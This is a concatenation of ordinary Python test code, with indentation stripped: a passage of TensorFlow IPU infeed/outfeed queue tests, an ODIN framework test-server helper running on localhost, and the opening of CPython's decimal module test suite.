r = ipu.loops.repeat(5, body1, (v))
return r
def body2(v):
outfeed = outfeed_queue2.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net2(v):
r = ipu.loops.repeat(7, body2, (v))
return r
with ops.device('cpu'):
v1 = array_ops.placeholder(np.float32, [4, 4])
v2 = array_ops.placeholder(np.float32, [5, 5])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res1 = ipu.ipu_compiler.compile(my_net1, inputs=[v1])
res2 = ipu.ipu_compiler.compile(my_net2, inputs=[v2])
outfeed1 = outfeed_queue1.dequeue()
outfeed2 = outfeed_queue2.dequeue()
with session_lib.Session() as sess:
result1 = sess.run(res1, {v1: np.ones([4, 4], np.float32)})
self.assertAllClose(result1[0], np.broadcast_to(6, [4, 4]))
outfed1 = sess.run(outfeed1)
for i in range(5):
self.assertAllClose(outfed1[i], np.broadcast_to(i + 1, [4, 4]))
result2 = sess.run(res2, {v2: np.full([5, 5], 4, np.float32)})
self.assertAllClose(result2[0], np.broadcast_to(11, [5, 5]))
outfed2 = sess.run(outfeed2)
for i in range(7):
self.assertAllClose(outfed2[i], np.broadcast_to(i + 4, [5, 5]))
@test_util.deprecated_graph_mode_only
def testOutfeedNonTensorOutputs(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body1():
with variable_scope.variable_scope("", use_resource=True):
w = variable_scope.get_variable(
"w",
dtype=np.float32,
shape=[1],
initializer=init_ops.constant_initializer(2.0))
outfeed = outfeed_queue.enqueue({101: 1, 2020: w})
return outfeed
def net():
r = ipu.loops.repeat(5, body1)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(net, inputs=[])
outfeed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
tu.move_variable_initialization_to_cpu()
sess.run(variables.global_variables_initializer())
sess.run(res)
outfed = sess.run(outfeed)
for i in range(5):
self.assertAllClose(outfed[101][i], 1)
self.assertAllClose(outfed[2020][i], [2.0])
@test_util.deprecated_graph_mode_only
def testTwoOutfeedsDifferentProgramsDelayedOutfeedRead(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue1 = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
outfeed_queue2 = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body1(v):
outfeed = outfeed_queue1.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net1(v):
r = ipu.loops.repeat(5, body1, (v))
return r
def body2(v):
outfeed = outfeed_queue2.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net2(v):
r = ipu.loops.repeat(7, body2, (v))
return r
with ops.device('cpu'):
v1 = array_ops.placeholder(np.float32, [4, 4])
v2 = array_ops.placeholder(np.float32, [5, 5])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res1 = ipu.ipu_compiler.compile(my_net1, inputs=[v1])
res2 = ipu.ipu_compiler.compile(my_net2, inputs=[v2])
outfeed1 = outfeed_queue1.dequeue()
outfeed2 = outfeed_queue2.dequeue()
with session_lib.Session() as sess:
result1 = sess.run(res1, {v1: np.ones([4, 4], np.float32)})
self.assertAllClose(result1[0], np.broadcast_to(6, [4, 4]))
result2 = sess.run(res2, {v2: np.full([5, 5], 4, np.float32)})
self.assertAllClose(result2[0], np.broadcast_to(11, [5, 5]))
outfed1 = sess.run(outfeed1)
for i in range(5):
self.assertAllClose(outfed1[i], np.broadcast_to(i + 1, [4, 4]))
outfed2 = sess.run(outfeed2)
for i in range(7):
self.assertAllClose(outfed2[i], np.broadcast_to(i + 4, [5, 5]))
@test_util.deprecated_graph_mode_only
def testInfeedUsingDatasetWithNestedDictNotUnpacked(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
x = {
"x0": np.ones(shape=[2], dtype=np.float32),
"x1": np.ones(shape=[2], dtype=np.float32)
}
y = np.ones(shape=[2], dtype=np.float32)
ds = dataset_ops.Dataset.from_tensor_slices((x, y))
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(ds)
def body(total, x, y):
total += x["x0"] + x["x1"] + y
return total
def my_net():
r = ipu.loops.repeat(2, body, [0.0], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net)
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertEqual(result, [6.0])
@test_util.deprecated_graph_mode_only
def testInfeedUsingDatasetWithOnlyDictIsUnpacked(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
x = {
"x0": np.ones(shape=[2], dtype=np.float32),
"x1": np.ones(shape=[2], dtype=np.float32)
}
ds = dataset_ops.Dataset.from_tensor_slices((x,))
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(ds)
def body(total, x0, x1):
total += x0 + x1
return total
def my_net():
r = ipu.loops.repeat(2, body, [0.0], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net)
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertEqual(result, [4.0])
@test_util.deprecated_graph_mode_only
def testInfeedDeleteBeforeInitializeShouldRaiseException(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
delete_op = infeed_queue.deleter
with session_lib.Session() as sess:
with self.assertRaisesRegex(errors_impl.NotFoundError,
"Infeed with id="):
sess.run(delete_op)
@test_util.deprecated_graph_mode_only
def testInfeedRestart(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
# Note: This is not something that we encourage or need to support,
# but it is the current behaviour that we document in this test:
# The infeed can be restarted by calling the `deleter` and then the
# `initializer` again.
def data_gen():
for i in range(5):
yield i
dataset = dataset_ops.Dataset.from_generator(data_gen, np.float32, ())
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
init_op = infeed_queue.initializer
delete_op = infeed_queue.deleter
def body(v, x):
v = v + x
return v
def my_net(v):
r = ipu.loops.repeat(5, body, (v), infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
[res] = ipu.ipu_compiler.compile(my_net, inputs=[0.0])
with session_lib.Session() as sess:
for _ in range(2):
sess.run(init_op)
self.assertEqual(sum(range(5)), sess.run(res))
sess.run(delete_op)
@test_util.deprecated_graph_mode_only
def testInfeedOutfeedContinuousDequeuing(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
num_iterations = 1000
dataset = tu.create_single_increasing_dataset(num_iterations, shape=[1])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(x):
return outfeed_queue.enqueue(x)
def my_net():
return ipu.loops.repeat(num_iterations, body, [], infeed_queue)
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
outfed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
def dequeue(result):
while len(result) != 1000:
r = sess.run(outfed)
if r.size:
result.extend(list(r.flatten()))
sess.run(infeed_queue.initializer)
r = []
dequeue_thread = Thread(target=dequeue, args=[r])
dequeue_thread.start()
sess.run(res)
dequeue_thread.join()
self.assertAllClose(r, range(0, 1000))
@test_util.deprecated_graph_mode_only
def testInfeedOutfeedContinuousDequeuingGetLastBeforeEnqueued(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
num_iterations = 1000
dataset = tu.create_single_increasing_dataset(num_iterations, shape=[1])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue(
outfeed_mode=ipu.ipu_outfeed_queue.IPUOutfeedMode.LAST)
def body(x):
return outfeed_queue.enqueue(x)
def my_net():
return ipu.loops.repeat(num_iterations, body, [], infeed_queue)
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
outfed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
with self.assertRaisesRegex(errors.FailedPreconditionError,
r'Trying to get the last value from an'):
sess.run(outfed)
sess.run(res)
@test_util.deprecated_graph_mode_only
def testCannotFeedInt64(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = dataset_ops.Dataset.range(5)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, x):
v = v + math_ops.cast(x, np.int32)
return v
def my_net():
r = ipu.loops.repeat(5, body, (0,), infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
ipu.ipu_compiler.compile(my_net, inputs=[])
with session_lib.Session() as sess:
with self.assertRaisesRegex(
errors.FailedPreconditionError,
"Unsupported datatype int64 on index 0 of feed operation"):
sess.run(infeed_queue.initializer)
@test_util.deprecated_graph_mode_only
def testFeedBools(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
left = [False, False, True, True]
right = [False, True, False, True]
dataset = dataset_ops.Dataset.from_tensor_slices((left, right))
dataset = dataset.batch(2, drop_remainder=True)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(l, r):
return outfeed_queue.enqueue(math_ops.logical_and(l, r))
def my_net():
return ipu.loops.repeat(2, body, infeed_queue=infeed_queue)
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
dequeued = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(res)
out = sess.run(dequeued)
self.assertAllEqual(np.logical_and(left, right), np.concatenate(out))
@test_util.deprecated_graph_mode_only
def testHashTableInDataPipeline(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], np.int32)
table = lookup_ops.StaticHashTableV1(
initializer=lookup_ops.KeyValueTensorInitializer(keys, values),
default_value=-1)
dataset = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery".split()])
dataset = dataset.map(table.lookup)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def my_net():
return infeed_queue._dequeue() # pylint: disable=protected-access
with ipu.scopes.ipu_scope("/device:IPU:0"):
[res] = ipu.ipu_compiler.compile(my_net)
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(table.initializer)
self.assertAllEqual([0, 0, -1, 1, 2], sess.run(res))
@test_util.deprecated_graph_mode_only
def testFeedInt8(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, dtype=np.int8, shape=[])
def m(x):
x = x - 5
return (x, math_ops.cast(x, np.uint8))
dataset = dataset.map(m)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(x1, x2):
x1 = math_ops.cast(x1, np.float16)
x2 = math_ops.cast(x2, np.float32)
x1 = x1 + 1
x2 = x2 - 1
x1 = math_ops.cast(x1, np.int8)
x2 = math_ops.cast(x2, np.uint8)
return outfeed_queue.enqueue((x1, x2))
def my_net():
return ipu.loops.repeat(10, body, infeed_queue=infeed_queue)
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
dequeued = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(res)
out = sess.run(dequeued)
self.assertAllEqual([-4, -3, -2, -1, 0, 1, 2, 3, 4, 5], out[0])
self.assertAllEqual([250, 251, 252, 253, 254, 255, 0, 1, 2, 3], out[1])
@test_util.deprecated_graph_mode_only
def test8bitOps(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(1, dtype=np.int8, shape=[10])
dataset = dataset.map(lambda x: (x, math_ops.cast(x, np.uint8)))
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(x1, x2):
results = [
array_ops.identity(x1),
array_ops.identity(x2),
array_ops.reshape(x1, shape=[2, 5]),
array_ops.reshape(x2, shape=[2, 5]),
array_ops.expand_dims(x1, axis=0),
array_ops.expand_dims(x2, axis=0),
array_ops.broadcast_to(x1, shape=[10, 10]),
array_ops.broadcast_to(x2, shape=[10, 10]),
]
return outfeed_queue.enqueue(results)
def my_net():
return ipu.loops.repeat(1, body, infeed_queue=infeed_queue)
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
dequeued = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(res)
out = sess.run(dequeued)
self.assertAllEqual(np.full([1, 10], 0), out[0])
self.assertAllEqual(np.full([1, 10], 0), out[1])
self.assertAllEqual(np.full([1, 2, 5], 0), out[2])
self.assertAllEqual(np.full([1, 2, 5], 0), out[3])
self.assertAllEqual(np.full([1, 1, 10], 0), out[4])
self.assertAllEqual(np.full([1, 1, 10], 0), out[5])
self.assertAllEqual(np.full([1, 10, 10], 0), out[6])
self.assertAllEqual(np.full([1, 10, 10], 0), out[7])
@test_util.run_v2_only
def testDeduceDevice(self):
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = [1, 1]
cfg.configure_ipu_system()
def fn(ordinal):
strategy = ipu.ipu_strategy.IPUStrategyV1(f"/device:IPU:{ordinal}")
with strategy.scope():
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
infeed_queue.initializer # pylint: disable=pointless-statement
def body(v, x):
v = v + x
outfeed = outfeed_queue.enqueue(v)
return (v, outfeed)
@def_function.function(experimental_compile=True)
def my_net(v):
r = ipu.loops.repeat(20, body, (v), infeed_queue)
return r
result = strategy.run(my_net, args=(np.ones([4, 4], np.float32),))
return result, outfeed_queue.dequeue()
self.assertAllClose(fn(0), fn(1))
@test_util.run_v2_only
def testInfeedSpec(self):
dataset = tu.create_single_increasing_dataset(10, dtype=np.int8, shape=[])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
with self.assertRaisesRegex(RuntimeError, "Spec for IPUInfeedQueue"):
spec = infeed_queue._type_spec # pylint: disable=protected-access
infeed_queue.initializer # pylint: disable=pointless-statement
# pylint: disable=protected-access
spec = infeed_queue._type_spec
self.assertEqual(spec._id, infeed_queue._id)
self.assertEqual(spec._structure, infeed_queue._structure)
self.assertEqual(spec._flat_structure, infeed_queue._flat_structure)
self.assertEqual(spec._device_ordinal, infeed_queue._device_ordinal)
self.assertEqual(spec._prefetch_depth, infeed_queue._prefetch_depth)
# pylint: enable=protected-access
ref_infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue._from_type_spec( # pylint: disable=protected-access
spec)
self.assertIsInstance(ref_infeed_queue,
ipu.ipu_infeed_queue.IPUInfeedQueue)
with self.assertRaisesRegex(RuntimeError, "IPUInfeedQueue created"):
ref_infeed_queue.initializer # pylint: disable=pointless-statement
with self.assertRaisesRegex(RuntimeError, "IPUInfeedQueue created"):
ref_infeed_queue.deleter # pylint: disable=pointless-statement
@test_util.run_v2_only
def testScopedOutfeed(self):
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = 1
cfg.ipu_model.tiles_per_ipu = 4
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.ScopedIPUOutfeedQueue()
strategy = ipu.ipu_strategy.IPUStrategyV1()
with strategy.scope():
@def_function.function(experimental_compile=True)
def my_net(num_iterations):
x = constant_op.constant(1, dtype=np.int32, shape=[2])
for _ in math_ops.range(num_iterations):
outfeed_queue.enqueue(x)
x += 1
strategy.run(my_net, args=(10,))
results = outfeed_queue.dequeue()
self.assertEqual(len(results), 10)
@test_util.run_v2_only
def testIPUIterator(self):
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = 1
cfg.ipu_model.tiles_per_ipu = 4
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
strategy = ipu.ipu_strategy.IPUStrategyV1()
dataset = tu.create_single_increasing_dataset(10, shape=[1])
with strategy.scope():
@def_function.function(experimental_compile=True)
def my_net(num_iterations, iterator):
x = constant_op.constant(1, dtype=np.int32, shape=[1])
for _ in math_ops.range(num_iterations):
outfeed_queue.enqueue(next(iterator) + x)
x += 1
num_iterations = 5
infeed = ipu.ipu_infeed_queue.IPUIterator(dataset=dataset)
strategy.run(my_net, args=(num_iterations, infeed))
self.assertAllEqual([[[1]], [[3]], [[5]], [[7]], [[9]]],
outfeed_queue.dequeue())
infeed._infeed_queue.deleter # pylint: disable=pointless-statement,protected-access
class IPUOutfeedIteratorTest(test_util.TensorFlowTestCase,
parameterized.TestCase):
@test_util.run_v2_only
def testCreation(self):
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
self.assertIsInstance(iter(outfeed_queue),
ipu.ipu_outfeed_queue.IPUOutfeedQueueIterator)
with self.assertRaisesRegex(RuntimeError,
"IPUOutfeedQueue can only be iterated"):
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue(
outfeed_mode=ipu.ipu_outfeed_queue.IPUOutfeedMode.LAST)
iter(outfeed_queue) # pylint: disable=pointless-statement
@parameterized.parameters([1, 2])
@test_util.run_v2_only
def testOutputs(self, replication_factor):
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = replication_factor
cfg.ipu_model.tiles_per_ipu = 4
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
strategy = ipu.ipu_strategy.IPUStrategyV1()
with strategy.scope():
@def_function.function(experimental_compile=True)
def my_net(num_iterations):
x = constant_op.constant(1, dtype=np.int32, shape=[2])
y = constant_op.constant(2, dtype=np.int32, shape=[])
for _ in math_ops.range(num_iterations):
outfeed_queue.enqueue((x, y))
x += 1
y *= 2
def get_results():
results = []
x_ref = 1
y_ref = 2
x_shape = [2]
y_shape = []
if replication_factor > 1:
x_shape = [replication_factor] + x_shape
y_shape = [replication_factor] + y_shape
for x, y in outfeed_queue:
self.assertAllEqual(x, np.full(x_shape, x_ref))
self.assertAllEqual(y, np.full(y_shape, y_ref))
results.append((x, y))
x_ref += 1
y_ref *= 2
return results
with self.assertRaises(StopIteration):
next(iter(outfeed_queue)) # pylint: disable=pointless-statement
strategy.run(my_net, args=(10,))
self.assertEqual(len(get_results()), 10)
# Check that when there are no results, it still behaves correctly.
self.assertEqual(len(get_results()), 0)
strategy.run(my_net, args=(5,))
self.assertEqual(len(get_results()), 5)
@test_util.run_v2_only
def testParallelDequeue(self):
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = 1
cfg.ipu_model.tiles_per_ipu = 4
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
strategy = ipu.ipu_strategy.IPUStrategyV1()
with strategy.scope():
@def_function.function(experimental_compile=True)
def my_net(num_iterations):
x = constant_op.constant(1, dtype=np.int32, shape=[2])
for _ in math_ops.range(num_iterations):
outfeed_queue.enqueue({"key": x})
x += 1
results = []
def get_results(num_iterations):
x_ref = 1
while len(results) != num_iterations:
for z in outfeed_queue:
self.assertIsInstance(z, dict)
self.assertAllEqual(z["key"], np.full([2], x_ref))
x_ref += 1
results.append(x_ref)
num_iterations = 100
dequeue_thread = Thread(target=get_results, args=[num_iterations])
dequeue_thread.start()
strategy.run(my_net, args=(num_iterations,))
dequeue_thread.join()
self.assertEqual(len(results), num_iterations)
if __name__ == "__main__":
googletest.main()
|
utils.py
|
"""
Utility classes to support testing the ODIN framework
Tim Nicholls, STFC Application Engineering Group
"""
import sys
import time
import threading
import logging
import os
from tempfile import NamedTemporaryFile
if sys.version_info[0] == 3: # pragma: no cover
from configparser import ConfigParser
import asyncio
else: # pragma: no cover
from ConfigParser import SafeConfigParser as ConfigParser
from tornado.ioloop import IOLoop
from odin import server
def log_message_seen(caplog, level, message, when="call"):
for record in caplog.get_records(when):
if record.levelno == level and message in record.getMessage():
return True
return False
class OdinTestServer(object):
server_port = 8888
server_addr = '127.0.0.1'
server_api_version = 0.1
def __init__(self, server_port=server_port, adapter_config=None, access_logging=None):
self.server_thread = None
self.server_event_loop = None
self.server_conf_file = NamedTemporaryFile(mode='w+')
parser = ConfigParser()
file_dir = os.path.dirname(os.path.abspath(__file__))
static_path = os.path.join(file_dir, 'static')
parser.add_section('server')
parser.set('server', 'debug_mode', '1')
parser.set('server', 'http_port', str(server_port))
parser.set('server', 'http_addr', self.server_addr)
parser.set('server', 'static_path', static_path)
if adapter_config is not None:
adapters = ', '.join([adapter for adapter in adapter_config])
parser.set('server', 'adapters', adapters)
if access_logging is not None:
parser.set("server", 'access_logging', access_logging)
parser.add_section('tornado')
parser.set('tornado', 'logging', 'debug')
if adapter_config is not None:
for adapter in adapter_config:
section_name = 'adapter.{}'.format(adapter)
parser.add_section(section_name)
for param in adapter_config[adapter]:
parser.set(section_name, param, str(adapter_config[adapter][param]))
parser.write(self.server_conf_file)
self.server_conf_file.file.flush()
server_args = ['--config={}'.format(self.server_conf_file.name)]
self.server_thread = threading.Thread(target=self._run_server, args=(server_args,))
self.server_thread.start()
time.sleep(0.2)
def __del__(self):
self.stop()
def _run_server(self, server_args):
if sys.version_info[0] == 3: # pragma: no cover
asyncio.set_event_loop(asyncio.new_event_loop())
self.server_event_loop = IOLoop.current()
server.main(server_args)
def stop(self):
if self.server_thread is not None:
self.server_event_loop.add_callback(self.server_event_loop.stop)
self.server_thread.join()
self.server_thread = None
if self.server_conf_file is not None:
self.server_conf_file.close()
def build_url(self, resource, api_version=None):
if api_version is None:
api_version = self.server_api_version
return 'http://{}:{}/api/{}/{}'.format(
self.server_addr, self.server_port,
api_version, resource
)
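# Example usage (an illustrative sketch only; the adapter name and module path
# below are assumptions made for demonstration, not taken from this file):
#
# server = OdinTestServer(
# adapter_config={'dummy': {'module': 'odin.adapters.dummy.DummyAdapter'}}
# )
# url = server.build_url('dummy/config')
# # -> 'http://127.0.0.1:8888/api/0.1/dummy/config'
# # ... issue HTTP requests against url from the test case, then ...
# server.stop()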
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former tests
Decimal arithmetic using the test cases provided by Mike Cowlishaw. The latter
tests the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings,
requires_legacy_unicode_capi, check_sanitizer)
from test.support import (TestFailed,
run_with_locale, cpython_only,
darwin_malloc_err_warning)
from test.support.import_helper import import_fresh_module
from test.support import threading_helper
from test.support import warnings_helper
import random
import inspect
import threading
if sys.platform == 'darwin':
darwin_malloc_err_warning('test_decimal')
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
import decimal as orig_sys_decimal
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
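# For example (an illustrative note, not part of the test data): an inexact
# division such as 1/3 signals both Rounded and Inexact; when traps for both
# are enabled cumulatively, the precedence checks below expect Inexact, the
# later entry in this list, to be the signal actually raised.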
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# When enabled, verify that expected conditions actually raise when trapped,
# rather than only being recorded in flags. Slower, since it runs some things
# several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = hasattr(C, 'DecClamped')
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
